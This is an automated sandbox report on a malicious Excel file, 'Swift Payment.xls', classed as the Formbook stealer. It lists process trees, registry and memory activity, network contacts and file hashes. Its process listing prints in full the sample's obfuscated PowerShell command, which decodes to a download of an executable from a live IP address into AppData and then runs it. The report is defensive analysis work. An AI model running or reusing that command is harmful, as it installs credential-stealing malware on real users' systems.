Malware Analysis Report

2025-01-18 12:24

Sample ID 240829-rkar8swbpf
Target Swift Payment.xls
SHA256 eaf3b9c1bdaf72da0a5d2a1a8c4f128712463c558e8af23830126bf07ef63847
Tags
formbook b48n defense_evasion discovery execution rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

eaf3b9c1bdaf72da0a5d2a1a8c4f128712463c558e8af23830126bf07ef63847

Threat Level: Known bad

The file Swift Payment.xls was found to be: Known bad.

Malicious Activity Summary

formbook b48n defense_evasion discovery execution rat spyware stealer trojan

Formbook

Process spawned unexpected child process

Formbook payload

Evasion via Device Credential Deployment

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 14:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 14:14

Reported

2024-08-29 14:17

Platform

win7-20240704-en

Max time kernel

149s

Max time network

133s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1984 set thread context of 2460 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 2460 set thread context of 1208 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Windows\Explorer.EXE
PID 2844 set thread context of 1208 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\MEmpEng.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2688 wrote to memory of 820 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 820 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 820 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 820 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 820 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1860 wrote to memory of 1944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1860 wrote to memory of 1944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1860 wrote to memory of 1944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1860 wrote to memory of 1944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1944 wrote to memory of 1184 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1944 wrote to memory of 1184 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1944 wrote to memory of 1184 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1944 wrote to memory of 1184 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1860 wrote to memory of 1984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1860 wrote to memory of 1984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1860 wrote to memory of 1984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1860 wrote to memory of 1984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\MEmpEng.exe C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1208 wrote to memory of 2844 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1208 wrote to memory of 2844 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1208 wrote to memory of 2844 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1208 wrote to memory of 2844 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2844 wrote to memory of 324 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 324 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 324 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 324 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'JEJqY0QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSREVmaU5JVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1dUTnVqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbU5Xd3hBVWtuVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE9lVEpqQ056LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZLKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3THRQQktOTnlLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpVTkcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQmpjRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNTU1L01FbXBFbmcuZXhlIiwiJEVOdjpBUFBEQVRBXE1FbXBFbmcuZXhlIiwwLDApO3N0YVJ0LXNsRWVwKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcTUVtcEVuZy5leGUi'+[cHAR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'JEJqY0QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSREVmaU5JVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1dUTnVqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbU5Xd3hBVWtuVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE9lVEpqQ056LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZLKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3THRQQktOTnlLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpVTkcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQmpjRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNTU1L01FbXBFbmcuZXhlIiwiJEVOdjpBUFBEQVRBXE1FbXBFbmcuZXhlIiwwLDApO3N0YVJ0LXNsRWVwKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcTUVtcEVuZy5leGUi'+[cHAR]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m9glxv2r.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEC5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCEC4.tmp"

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

"C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

"C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\SysWOW64\explorer.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.16.170.42:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
DE 88.99.66.38:443 zhort.de tcp
NL 45.89.247.151:80 45.89.247.151 tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.157:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.leaningcompanies-near-me.today udp
US 8.8.8.8:53 www.5571.club udp
US 8.8.8.8:53 www.srsvrfive.xyz udp
US 8.8.8.8:53 www.op-smartphone-deals.today udp

Files

memory/2276-1-0x0000000071FED000-0x0000000071FF8000-memory.dmp

memory/2276-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2688-19-0x00000000025B0000-0x00000000025B2000-memory.dmp

memory/2276-20-0x0000000002420000-0x0000000002422000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 603c5da8c0b5fe7205a5f3e72cec9482
SHA1 2d323cfc3f157f4f77adfea98fdf3d8494f87d27
SHA256 e6d873379836293e2df10f1444e76516b7891b092c1be540c2a1e820b2d62d13
SHA512 6adc8a4f80fc294aba1d4515f5e43a6acc3e4eedaa6785b3fcaf582ee3baee6e4692a2eb67f961801b74e4055c572e47a54f4530c6dd40bea6b7578bccdbaafb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

MD5 759ed84c7a10931413e9616b819989c3
SHA1 da0f62501a26f2afe09105b250292eab898e3062
SHA256 c9878b853d06d37df8f1cba52b3ed4575ba683e38bd16f42062bf372efe0e8dc
SHA512 95e8a240a468a5f8497acf279b337f888d33f2f8ac334502b3fe5ddfbc13e2cbf23a727a3a7137bed187c23199b6d6a9fba2f355c7300dd39dc63dd21af75797

C:\Users\Admin\AppData\Local\Temp\CabABAA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

MD5 2a22d79f810194591562f5550fd2fdaf
SHA1 9085f1492a5bcc3f539169ebd82cbe8ead4f4eec
SHA256 d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1
SHA512 281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WNZH54VQ\IEnetstateIntenet[1].hta

MD5 1c08a8e3980fc2229abeea76dbf6d328
SHA1 189b2caf360cc40757ae8897aa4be78d465d0b3b
SHA256 b39a46724746ba0ff1f4c6a596a643c4281bc171adbdb269baa42e6f68cf395c
SHA512 8023ff2f97287f0069b6074dbaf412095cd8670e8baed8f961feec2f3be654bc6230b95a09777847c77496ff3ea2ac1ddf5b5fbb394b99e1186c0a899bc78e87

memory/2276-34-0x0000000071FED000-0x0000000071FF8000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\m9glxv2r.cmdline

MD5 d77938b87970b7fbfe88933c798068cb
SHA1 5af4971a41e26df349b470c22274bae321332768
SHA256 521548261d079fc88630d5a37d6b40ef8e8104caf2c195906debf1e3b1f43871
SHA512 9f23e77336702647a7f56fd85650bc9f675a4200d3d953abd290ead600b413db81d2ef406d621d181153250d73b1b8f3ed0ef9cb4214e5da52670004cb293f3a

\??\c:\Users\Admin\AppData\Local\Temp\m9glxv2r.0.cs

MD5 ea113715d78eb5483c3507b3cbaebc06
SHA1 daa1297b0545649dd504537c2810082ef4156c32
SHA256 812d03a581b330a9d0dc751fc29857600c7a6988b748fb5c091850c2ac1e0a7d
SHA512 3595451c9eccd0fda379e6d906f45c87b90f52e0c70b609145ec037127fb72001b8f38697ff497806bc20cbecbc0c29d3565db15cc08a4f420d97e65b1aaa051

\??\c:\Users\Admin\AppData\Local\Temp\CSCCEC4.tmp

MD5 a605be4920833aecd90fa003dd64909e
SHA1 7484f03596b48cbb168f1d6137f96061bde71362
SHA256 b1fe652d82d900482e59066ecfdb63cf8e64bb59ebe82ad4e223a0cc180dca42
SHA512 32d1fb29e959a1efa6616f401b880bf3483bb7df92f20384d58fa07bca8436501c42f072e6e5a05113000c750c4d8e7a6524c14cdd67d42589b58c05339de803

C:\Users\Admin\AppData\Local\Temp\RESCEC5.tmp

MD5 5069aec363046127f78dc287be7782fa
SHA1 1b553469f665d84707400792b22c97d49cce710d
SHA256 1189418bbdc7d61743e20ffd41eac8d074a13c95d50bd010ac21c701c92e8397
SHA512 4463de2dba36af3e9a7ae2222ebc4b71e8da094cc50a24b6da2c364ac14f5d6a93a53169146e6e64edba8907ca4744b7c7fe538b6fca5afcdc054084ce990c4c

C:\Users\Admin\AppData\Local\Temp\m9glxv2r.dll

MD5 91a571987480a1d92b545097ee28c4b4
SHA1 5b2751371aa3097686cb02a1de18d9d188ff939b
SHA256 0fbd19ab7049a34a1b28225580f4c17bb693632d0cd24b6a23341f3b8bb466ea
SHA512 da321bec27ffc01af1684c9ae4e8f9acbc59c66df268b03afd2185b88185701870f5571cc237d769386e1d78905b370b439f361b6389a318480914aa13738a68

C:\Users\Admin\AppData\Local\Temp\m9glxv2r.pdb

MD5 2195048dd458b08c3623987a45b265b6
SHA1 ce3d4c259a83c180575d84ceb3292d237ab6e552
SHA256 3956932ff549efc73b8b29a6900c2c786ea6bfb94cd6d72caba7bf8c0e473e07
SHA512 c64f75930525fc80f917bb72eecc57d6cdae6db31345653bcd49a4b644b1b24f57db847d3471198f95cf29ac392f9cbb058acbf28ed2ef9596de6d9ba59eb637

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

MD5 dd2e0becfb1316c49975386fc3367c45
SHA1 98c578ff997ef781919ca5967251fa9d462a756e
SHA256 14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628
SHA512 4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

memory/1984-65-0x0000000000D40000-0x0000000000DDC000-memory.dmp

memory/1984-66-0x0000000000D20000-0x0000000000D38000-memory.dmp

memory/1984-67-0x0000000004890000-0x0000000004906000-memory.dmp

memory/2460-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2460-68-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2460-70-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2460-73-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2844-76-0x0000000000090000-0x0000000000311000-memory.dmp

memory/2844-77-0x0000000000320000-0x000000000034F000-memory.dmp

memory/1208-81-0x0000000006EC0000-0x0000000006FCB000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA663E76.emf

MD5 8a188a6917ad1fa0c7f1aa20a63c8593
SHA1 4d2270d647d4a3680b47e85501c7ab1442ddcbb2
SHA256 728a3d9b1bee7cd8baa90aa0b1a4805a93238c8f835ea685931ac676ba7ef3e3
SHA512 823246cac3d8a45980ce0623c485fb0b74ce7aa68cca37b22fef1924685f1201298163c398688057736ec4551999b5455db1c97abc7da97e5a07589cd4fd7cdf

memory/2276-86-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2276-89-0x0000000071FED000-0x0000000071FF8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 14:14

Reported

2024-08-29 14:17

Platform

win10v2004-20240802-en

Max time kernel

145s

Max time network

131s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 948 wrote to memory of 3192 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 948 wrote to memory of 3192 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4156,i,9445584274764997943,12714240264001792460,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 38.66.99.88.in-addr.arpa udp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.16.170.50:80 e6.o.lencr.org tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
